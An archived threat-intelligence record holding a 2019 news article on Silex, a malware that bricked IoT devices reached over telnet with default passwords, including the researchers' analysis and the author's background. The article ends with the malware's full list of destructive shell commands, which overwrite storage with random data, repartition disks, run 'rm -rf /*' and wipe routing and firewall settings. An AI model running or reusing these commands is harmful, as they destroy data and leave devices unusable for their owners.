{
	"id": "a6321a13-3dcc-466c-88d5-88cf0ad0e66c",
	"created_at": "2026-04-10T03:21:27.927897Z",
	"updated_at": "2026-04-10T03:22:17.426954Z",
	"deleted_at": null,
	"sha1_hash": "1fa5aa0480b2472041e4dcf7acb14e5e138ee20d",
	"title": "New Silex Malware Trashes IoT Devices Using Default Passwords",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2238125,
	"plain_text": "New Silex Malware Trashes IoT Devices Using Default Passwords\r\nBy Ionut Ilascu\r\nPublished: 2019-06-26 · Archived: 2026-04-10 02:22:29 UTC\r\nA teen coder and his team developed a new malware named Silex that purposely bricked poorly protected IoT\r\ndevices by the thousands in a short period of time.\r\nThe attacks have stopped as the command and control (C2) server went down around 4 PM Eastern Time, by the\r\ndeveloper's doing. Even without a C2 to send out instructions, the malware will still run its destruction routines on\r\ninfected devices.\r\nBricking devices to prove a point\r\nAccording to security researcher Ankit Anubhav from NewSky, Silex was created by a team of three, with the\r\nmain person being a teenager from a European country using the aliases 'Light The Leafon' and 'Light The\r\nSylveon.'  The other two members are 'Alx' and 'Skiddy'.\r\nLight The Leafon is the author of another bot called HITO, which was based off another IoT malware named\r\nMirai. He soon developed skills that allowed him to write his own botnet.\r\nhttps://www.bleepingcomputer.com/news/security/new-silex-malware-trashes-iot-devices-using-default-passwords/\r\nPage 1 of 4\n\nAs for the purpose of Silex, it is designed solely to brick IoT devices to prevent script kiddies from getting to\r\nthem. Simply put, the malware author is fighting less skilled developers from compromising unprotected systems\r\nand using them to make money.\r\nWhen it runs, Silex shows the following message from the author apologizing for the attack and explaining the\r\nreason behind it:\r\nAnubhav talked to Light about HITO two months ago and published the interview on his podcast. The author said\r\nduring the interview that he was 14 years old.\r\nSilex destructive routines\r\nLarry Cashdollar of Akamai Security Intelligence Response Team (SIRT) was the first to discover Silex on\r\nTuesday. The malware hit his honeypot by trying default credentials over a telnet connection.\r\nThe researcher says that Silex kills the system it infects by writing random data from '/dev/random' to all the\r\nstorage drives it finds.\r\n\"Examining binary samples collected from my honeypot, I see Silexbot calling fdisk -l which will list all disk\r\npartitions. Using that list, Silexbot then writes random data from /dev/random to any of the partitions it discovers,\"\r\nCashdollar writes in his analysis.\r\nSilex then runs other harmful commands that delete network configurations, flush iptables, and add a rule that\r\nDROPS all connections, before rebooting the device. A list of the damaging commands it executes to brick the IoT\r\ndevice is available at the end of the article.\r\nThese instructions make the affected system inoperable but they can still be recovered by reinstalling the\r\nfirmware. However, this is an operation most users lack the knowledge to perform and their gadgets may end up in\r\nthe trash since they seem to no longer function.\r\nCashdollar examined binaries for ARM systems but there was also a Bash shell version available for download, so\r\nany UNIX-like architecture could have been a target.\r\nAnubhav also observed Silex on a honeypot he manages and saw the same destructive behavior as Cashdollar.\r\nThe researcher told BleepingComputer the attack was over telnet protected with weak credentials or default\r\npasswords. After establishing a connection \"the bot downloads the binary and confirms the busybox shell\" and\r\nthen executes the bricking commands.\r\nToo much heat makes Light split\r\nhttps://www.bleepingcomputer.com/news/security/new-silex-malware-trashes-iot-devices-using-default-passwords/\r\nPage 2 of 4\n\nAnubhav talked to Light today and the malware author stated he never wanted the type of attention he is getting\r\nand he would leave the IoT community.\r\n\"I am leaving the community because I am getting more attention then I'd like, I never wanted this clout. I will\r\nkeep coding and doing that but not go further in the IoT community,\" Light told the security researcher.\r\nThe original plan for Silex was to grow the botnet by integrating new methods of compromise, like exploits for\r\nknown vulnerabilities.\r\nSilex commands:\r\n\"busybox cat /dev/urandom \u003e/dev/mtdblock0\"\r\n\"busybox cat /dev/urandom \u003e/dev/sda\"\r\n\"busybox cat /dev/urandom \u003e/dev/ram0\"\r\n\"busybox cat /dev/urandom \u003e/dev/mmc0\"\r\n\"busybox cat /dev/urandom \u003e/dev/mtdblock10\"\r\n\"fdisk -C 1 -H 1 -S 1 /dev/mtd0\"\r\n\"fdisk -C 1 -H 1 -S 1 /dev/mtd1\"\r\n\"fdisk -C 1 -H 1 -S 1 /dev/sda\"\r\n\"fdisk -C 1 -H 1 -S 1 /dev/mtdblock0\"\r\ncat /proc/mounts\r\ncat /dev/urandom | mtd_write mtd0 - 0 32768\r\ncat /dev/urandom | mtd_write mtd1 - 0 32768\r\nbusybox cat /dev/urandom \u003e/dev/mtd0 \u0026\r\nbusybox cat /dev/urandom \u003e/dev/sda \u0026\r\nbusybox cat /dev/urandom \u003e/dev/mtd1 \u0026\r\nbusybox cat /dev/urandom \u003e/dev/mtdblock0 \u0026\r\nbusybox cat /dev/urandom \u003e/dev/mtdblock1 \u0026\r\nbusybox cat /dev/urandom \u003e/dev/mtdblock2 \u0026\r\nbusybox cat /dev/urandom \u003e/dev/mtdblock3 \u0026\r\nbusybox route del default\r\ncat /dev/urandom \u003e/dev/mtdblock0 \u0026\r\ncat /dev/urandom \u003e/dev/mtdblock1 \u0026\r\ncat /dev/urandom \u003e/dev/mtdblock2 \u0026\r\ncat /dev/urandom \u003e/dev/mtdblock3 \u0026\r\ncat /dev/urandom \u003e/dev/mtdblock4 \u0026\r\ncat /dev/urandom \u003e/dev/mtdblock5 \u0026\r\ncat /dev/urandom \u003e/dev/mmcblk0 \u0026\r\ncat /dev/urandom \u003e/dev/mmcblk0p9 \u0026\r\ncat /dev/urandom \u003e/dev/mmcblk0p12 \u0026\r\ncat /dev/urandom \u003e/dev/mmcblk0p13 \u0026\r\ncat /dev/urandom \u003e/dev/root \u0026\r\ncat /dev/urandom \u003e/dev/mmcblk0p8 \u0026\r\ncat /dev/urandom \u003e/dev/mmcblk0p16 \u0026\r\nroute del default\r\niproute del default\r\nip route del default\r\nhttps://www.bleepingcomputer.com/news/security/new-silex-malware-trashes-iot-devices-using-default-passwords/\r\nPage 3 of 4\n\nrm -rf /* 2\u003e/dev/null \u0026 iptables -F\r\niptables -t nat -F\r\niptables -A INPUT -j DROP\r\niptables -A FORWARD -j DROP\r\nhalt -n -f\r\nreboot\r\nAutomated Pentesting Covers Only 1 of 6 Surfaces.\r\nAutomated pentesting proves the path exists. BAS proves whether your controls stop it. Most teams run one\r\nwithout the other.\r\nThis whitepaper maps six validation surfaces, shows where coverage ends, and provides practitioners with three\r\ndiagnostic questions for any tool evaluation.\r\nSource: https://www.bleepingcomputer.com/news/security/new-silex-malware-trashes-iot-devices-using-default-passwords/\r\nhttps://www.bleepingcomputer.com/news/security/new-silex-malware-trashes-iot-devices-using-default-passwords/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.bleepingcomputer.com/news/security/new-silex-malware-trashes-iot-devices-using-default-passwords/"
	],
	"report_names": [
		"new-silex-malware-trashes-iot-devices-using-default-passwords"
	],
	"threat_actors": [],
	"ts_created_at": 1775791287,
	"ts_updated_at": 1775791337,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1fa5aa0480b2472041e4dcf7acb14e5e138ee20d.pdf",
		"text": "https://archive.orkl.eu/1fa5aa0480b2472041e4dcf7acb14e5e138ee20d.txt",
		"img": "https://archive.orkl.eu/1fa5aa0480b2472041e4dcf7acb14e5e138ee20d.jpg"
	}
}